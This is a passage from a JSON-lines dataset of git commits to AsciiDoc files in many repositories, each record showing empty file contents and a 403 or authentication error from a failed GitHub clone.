2015-09-02-title.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-09-02-title.adoc","new_file":"_posts\/2015-09-02-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea04eb7090bad3cc2811ab764df4ca15c309559c","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f29da4212a226df2368c2182a8929a577705e847","subject":"y2b create post The Ultimate Gaming PC - Custom Gaming PC Build (UGPC 2012)","message":"y2b create post The Ultimate Gaming PC - Custom Gaming PC Build (UGPC 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-10-The-Ultimate-Gaming-PC--Custom-Gaming-PC-Build-UGPC-2012.adoc","new_file":"_posts\/2012-12-10-The-Ultimate-Gaming-PC--Custom-Gaming-PC-Build-UGPC-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c57675a91e6cb133d266b924ba6e309871436b41","subject":"HWKMETRICS-239: Fix space issue in the ReadMe which was edited online. The checkstyle should pass now.","message":"HWKMETRICS-239: Fix space issue in the ReadMe which was edited online. The checkstyle should pass now.\n","repos":"mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,burmanm\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,pilhuhn\/rhq-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,mwringe\/hawkular-metrics,spadgett\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,spadgett\/hawkular-metrics,ppalaga\/hawkular-metrics,spadgett\/hawkular-metrics","old_file":"containers\/README.adoc","new_file":"containers\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd176cf8baaaaa26018fb895925c3525c25c5ca1","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/fourth.adoc","new_file":"content\/writings\/fourth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"477d1ce1010e5421a957ac5b5f164f53e5a6370d","subject":"Renamed '_posts\/About-Me.adoc' to '_posts\/about-me.adoc'","message":"Renamed '_posts\/About-Me.adoc' to '_posts\/about-me.adoc'","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/about-me.adoc","new_file":"_posts\/about-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"962ae069b4452a43077e1450c391225060192e41","subject":"Update 2015-02-20-Mistaken-Million.adoc","message":"Update 2015-02-20-Mistaken-Million.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c70600ee3e470cdfc1441cb1ba69eb562fdb12d","subject":"Update 2017-07-21-Friday.adoc","message":"Update 2017-07-21-Friday.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-21-Friday.adoc","new_file":"_posts\/2017-07-21-Friday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c25eb3a885d39c43e684122d64feec4de803ea6","subject":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","message":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a37379e04b55680e60b6063140ef6a943acc000","subject":"Update 2017-02-06-Pointers-to-Pointers-to-Pointers-to.adoc","message":"Update 2017-02-06-Pointers-to-Pointers-to-Pointers-to.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2017-02-06-Pointers-to-Pointers-to-Pointers-to.adoc","new_file":"_posts\/2017-02-06-Pointers-to-Pointers-to-Pointers-to.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36f82e252b0d593cdda4c5239173c49bec3a5369","subject":"y2b create post Duke Nukem Forever Balls of Steel Edition Unboxing","message":"y2b create post Duke Nukem Forever Balls of Steel Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-14-Duke-Nukem-Forever-Balls-of-Steel-Edition-Unboxing.adoc","new_file":"_posts\/2011-06-14-Duke-Nukem-Forever-Balls-of-Steel-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32fcfdaa1e8ca30da18f49428d2aead2fcbf5627","subject":"Update 2017-11-01-Fear-Factorys-song-Cyberwaste-perfect-but-one-word.adoc","message":"Update 2017-11-01-Fear-Factorys-song-Cyberwaste-perfect-but-one-word.adoc","repos":"fuhrerscene\/fuhrerscene.github.io,fuhrerscene\/fuhrerscene.github.io,fuhrerscene\/fuhrerscene.github.io,fuhrerscene\/fuhrerscene.github.io","old_file":"_posts\/2017-11-01-Fear-Factorys-song-Cyberwaste-perfect-but-one-word.adoc","new_file":"_posts\/2017-11-01-Fear-Factorys-song-Cyberwaste-perfect-but-one-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fuhrerscene\/fuhrerscene.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"510524969869520e53e5fbf6daa1de8a1a978548","subject":"004 README","message":"004 README\n","repos":"edusantana\/udc-texts-to-compare-asciidoc-toolchains","old_file":"udc\/004\/README.asciidoc","new_file":"udc\/004\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/edusantana\/udc-texts-to-compare-asciidoc-toolchains.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d58f7405c69c4a7f4880d0cb974e0c4ffb1d62fe","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30512d58c91b6c3d71c462ae2c5ad58236ac2358","subject":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","message":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06cf66c5f08d9c37c86a934e2e1116014f097df1","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"0964da03bca1e9dacc24b313e3b55924b13a9f36","subject":"y2b create post Logitech Performance Mouse MX Unboxing \\u0026 Overview","message":"y2b create post Logitech Performance Mouse MX Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-24-Logitech-Performance-Mouse-MX-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-06-24-Logitech-Performance-Mouse-MX-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0926036d229292e0fddbf35f6963e03fca492d94","subject":"y2b create post The Best Headphones That Money Can Buy...","message":"y2b create post The Best Headphones That Money Can Buy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-13-The%20Best%20Headphones%20That%20Money%20Can%20Buy....adoc","new_file":"_posts\/2018-01-13-The%20Best%20Headphones%20That%20Money%20Can%20Buy....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81852ab742e990ff2aa65c35d03f35e0ae9a0171","subject":"Update 2015-06-05-Ma-journee-au-web2day.adoc","message":"Update 2015-06-05-Ma-journee-au-web2day.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-05-Ma-journee-au-web2day.adoc","new_file":"_posts\/2015-06-05-Ma-journee-au-web2day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b74e7a7f52f87be717421e0a27b45d939c80264e","subject":"updated cluster scaling readme","message":"updated cluster scaling readme\n","repos":"arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,wombat\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"cluster-scaling\/readme.adoc","new_file":"cluster-scaling\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad14962dceede1a3ff2036b12561307b94eae383","subject":"start sample queries","message":"start sample queries\n","repos":"ridgebacknet\/ridgeback-hunter-db","old_file":"sample-queries.adoc","new_file":"sample-queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ridgebacknet\/ridgeback-hunter-db.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6b7940e123655c8efa696c55c31fa69fa491c05","subject":"Added development environment documentation","message":"Added development environment documentation\n","repos":"lefou\/blended,woq-blended\/blended,woq-blended\/blended,lefou\/blended","old_file":"doc\/Development.adoc","new_file":"doc\/Development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"def46153a9e5fa4f24666366d639a99717b5ac3c","subject":"Update 2015-05-11-Flashing-Nexus-9-flounder.adoc","message":"Update 2015-05-11-Flashing-Nexus-9-flounder.adoc","repos":"hapee\/hapee.github.io,hapee\/hapee.github.io,hapee\/hapee.github.io","old_file":"_posts\/2015-05-11-Flashing-Nexus-9-flounder.adoc","new_file":"_posts\/2015-05-11-Flashing-Nexus-9-flounder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hapee\/hapee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9efae0806cd7a448a978830a36bd2856b0bd87db","subject":"Update 2015-06-10-Por-que-debes-usar-github.adoc","message":"Update 2015-06-10-Por-que-debes-usar-github.adoc","repos":"nectia-think\/nectia-think.github.io,nectia-think\/nectia-think.github.io,nectia-think\/nectia-think.github.io","old_file":"_posts\/2015-06-10-Por-que-debes-usar-github.adoc","new_file":"_posts\/2015-06-10-Por-que-debes-usar-github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nectia-think\/nectia-think.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdc4e6a1ab73adea3193ffc4ca1cf67f0a003bff","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75cdef63199864b8a43f48138b1fd3ffc6385898","subject":"Update 2016-05-03-The-Final-Blog-Post.adoc","message":"Update 2016-05-03-The-Final-Blog-Post.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-05-03-The-Final-Blog-Post.adoc","new_file":"_posts\/2016-05-03-The-Final-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b97f76beb3ea3f71c2405a5bef7ea1c5ed0ef6fe","subject":"y2b create post Google's Gaming Console?","message":"y2b create post Google's Gaming Console?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-28-Googles-Gaming-Console.adoc","new_file":"_posts\/2014-06-28-Googles-Gaming-Console.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4761b701eb7d8c0af1ba6153ddbb19a31eac401d","subject":"#11: Fix links","message":"#11: Fix links","repos":"netzwerg\/paleo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netzwerg\/paleo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a45e2efa00d18eccd03a54770a6d7b4aff187515","subject":"fix typo in migrate_6_0\/java.asciidoc","message":"fix typo in migrate_6_0\/java.asciidoc\n","repos":"brandonkearby\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,shreejay\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,umeshdangat\/elasticsearch,scottsom\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticsearch,maddin2016\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,robin13\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,jimczi\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,LeoYao\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,vroyer\/elassandra,scottsom\/elasticsearch,nknize\/elasticsearch,nezirus\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,Stacey-Gammon\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_6_0\/java.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b949b62076642c89530995ea2eb167fa21276b06","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04d01c8578affd068eab208fc3d7c335f6af0273","subject":"\u0414\u043e\u0434\u0430\u0434\u0435\u043d .adoc \u0444\u0430\u0458\u043b\u043e\u0442 \u0437\u0430 \u0410\u0412-10","message":"\u0414\u043e\u0434\u0430\u0434\u0435\u043d .adoc \u0444\u0430\u0458\u043b\u043e\u0442 \u0437\u0430 \u0410\u0412-10","repos":"finki-mk\/OOP,finki-mk\/OOP","old_file":"docs\/src\/oop_av10.adoc","new_file":"docs\/src\/oop_av10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/finki-mk\/OOP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd09c7fd800e95b15a33eda6525e3b011896d267","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed3c47b12bfb7499da26d851608257c43760a1dc","subject":"Update 2016-01-11-OpenGL-ES-android-La-libreria-de-la-que-me-he-enamorado.adoc","message":"Update 2016-01-11-OpenGL-ES-android-La-libreria-de-la-que-me-he-enamorado.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-01-11-OpenGL-ES-android-La-libreria-de-la-que-me-he-enamorado.adoc","new_file":"_posts\/2016-01-11-OpenGL-ES-android-La-libreria-de-la-que-me-he-enamorado.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc6a1b422ac95e35b01f20b884eb77c3c6079036","subject":"CAMEL-10612: adding reactive-streams documentation","message":"CAMEL-10612: adding reactive-streams documentation\n","repos":"tadayosi\/camel,drsquidop\/camel,chirino\/camel,sverkera\/camel,objectiser\/camel,NickCis\/camel,jkorab\/camel,tdiesler\/camel,onders86\/camel,pmoerenhout\/camel,dmvolod\/camel,tdiesler\/camel,christophd\/camel,prashant2402\/camel,mcollovati\/camel,NickCis\/camel,tlehoux\/camel,driseley\/camel,tlehoux\/camel,acartapanis\/camel,jonmcewen\/camel,pax95\/camel,pkletsko\/camel,ssharma\/camel,cunningt\/camel,zregvart\/camel,tlehoux\/camel,pax95\/camel,pax95\/camel,cunningt\/camel,ssharma\/camel,scranton\/camel,RohanHart\/camel,alvinkwekel\/camel,rmarting\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,zregvart\/camel,Thopap\/camel,davidkarlsen\/camel,snurmine\/camel,nicolaferraro\/camel,alvinkwekel\/camel,curso007\/camel,kevinearls\/camel,mcollovati\/camel,nboukhed\/camel,onders86\/camel,yuruki\/camel,drsquidop\/camel,jkorab\/camel,Fabryprog\/camel,Fabryprog\/camel,mgyongyosi\/camel,rmarting\/camel,jonmcewen\/camel,DariusX\/camel,CodeSmell\/camel,lburgazzoli\/apache-camel,acartapanis\/camel,pkletsko\/camel,anoordover\/camel,RohanHart\/camel,gautric\/camel,anton-k11\/camel,nicolaferraro\/camel,mcollovati\/camel,tlehoux\/camel,CodeSmell\/camel,lburgazzoli\/camel,zregvart\/camel,jamesnetherton\/camel,rmarting\/camel,chirino\/camel,yuruki\/camel,rmarting\/camel,kevinearls\/camel,christophd\/camel,adessaigne\/camel,pax95\/camel,jonmcewen\/camel,lburgazzoli\/apache-camel,driseley\/camel,apache\/camel,dmvolod\/camel,christophd\/camel,allancth\/camel,kevinearls\/camel,nboukhed\/camel,prashant2402\/camel,RohanHart\/camel,DariusX\/camel,jonmcewen\/camel,nboukhed\/camel,akhettar\/camel,NickCis\/camel,jkorab\/camel,tlehoux\/camel,kevinearls\/camel,lburgazzoli\/camel,NickCis\/camel,sverkera\/camel,isavin\/camel,objectiser